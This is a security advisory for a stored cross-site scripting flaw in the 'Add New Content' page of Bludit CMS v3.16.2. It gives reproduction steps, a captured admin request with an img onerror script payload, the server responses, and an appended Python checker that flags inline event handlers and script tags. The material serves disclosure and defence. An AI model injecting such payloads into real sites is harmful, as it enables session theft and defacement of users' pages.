Bludit v3.16.2 Stored XSS Vulnerability Analysis: Attack via the "Add New Content" Function

This article analyses a stored XSS vulnerability in Bludit CMS v3.16.2: an attacker can inject malicious script through the "Add New Content" function. It includes the full reproduction steps and the HTTP request/response data.

Exploit Title: Bludit v3.16.2 - Stored XSS in "Add New Content" Functionality

Date: July 2025

Exploit Author: Andrey Stoykov

Version: 3.16.2

Tested on: Debian 12

Blog: https://msecureltd.blogspot.com/

Stored XSS "Add New Content" Functionality #1:

Steps to Reproduce:

  1. Log in with an administrator account and browse to "New content"
  2. In the "Source code" field, enter the following payload (the content parameter of the POST request below)
  3. The XSS payload is triggered when "Preview" is clicked

// HTTP POST request to add the new content

POST /bludit/admin/new-content HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[…]

tokenCSRF=03a860fcc567fed86f6cb57e5877a469ef27e2ac&uuid=b219c568827ee49d5b8be839d6ab1043&type=published&coverImage=&content=<img+src%3d""+onerror%3d"alert(document.domain)">&category=&description=&date=2025-06-04+15%3A15%3A17&typeSelector=published&position=3&tags=&template=&externalCoverImage=&slug=xss&noindex=0&nofollow=0&noarchive=0&title=xss

// HTTP response

HTTP/1.1 301 Moved Permanently
Date: Wed, 04 Jun 2025 19:16:04 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: Bludit
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /bludit/admin/content
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

// HTTP GET request that triggers the XSS

GET /bludit/admin/edit-content/xss HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[…]

// HTTP response

HTTP/1.0 200 OK
Date: Wed, 04 Jun 2025 19:16:06 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: Bludit
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

[…]
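As an added example (not part of the advisory or of Bludit's own code), the helper below URL-decodes the form body of the POST request above and reports active HTML in the content field: inline on* event handlers, script/iframe/object/embed tags, and javascript: URLs. This is the kind of check a reviewer or a request-log rule can apply to admin content submissions; the function and class names are assumptions, and the benign body is constructed for comparison.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Request body copied from the POST /bludit/admin/new-content request in the advisory.
NEW_CONTENT_BODY = (
    "tokenCSRF=03a860fcc567fed86f6cb57e5877a469ef27e2ac&uuid=b219c568827ee49d5b8be839d6ab1043"
    "&type=published&coverImage=&content=<img+src%3d\"\"+onerror%3d\"alert(document.domain)\">"
    "&category=&description=&date=2025-06-04+15%3A15%3A17&typeSelector=published&position=3"
    "&tags=&template=&externalCoverImage=&slug=xss&noindex=0&nofollow=0&noarchive=0&title=xss"
)

# Constructed benign body: ordinary markup with no active content.
BENIGN_BODY = "content=<p>Hello <b>world</b></p>&slug=hello&title=hello"


class ActiveContentFinder(HTMLParser):
    """Collects (tag, attribute) pairs that can execute script when rendered."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Tags that load or run code on their own, regardless of attributes.
        if tag in ("script", "iframe", "object", "embed"):
            self.findings.append((tag, None))
        for name, value in attrs:
            if name.startswith("on"):
                # Inline event handler such as onerror, onload, onclick.
                self.findings.append((tag, name))
            elif name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append((tag, name))


def find_active_content(form_body: str, field: str = "content"):
    """Decode a form-encoded body and list active HTML found in `field` (empty list = clean)."""
    values = parse_qs(form_body, keep_blank_values=True).get(field, [])
    finder = ActiveContentFinder()
    for value in values:
        finder.feed(value)  # parse_qs already turned '+' and %XX into the raw HTML
    finder.close()
    return finder.findings


if __name__ == "__main__":
    print(find_active_content(NEW_CONTENT_BODY))  # [('img', 'onerror')]
    print(find_active_content(BENIGN_BODY))       # []
```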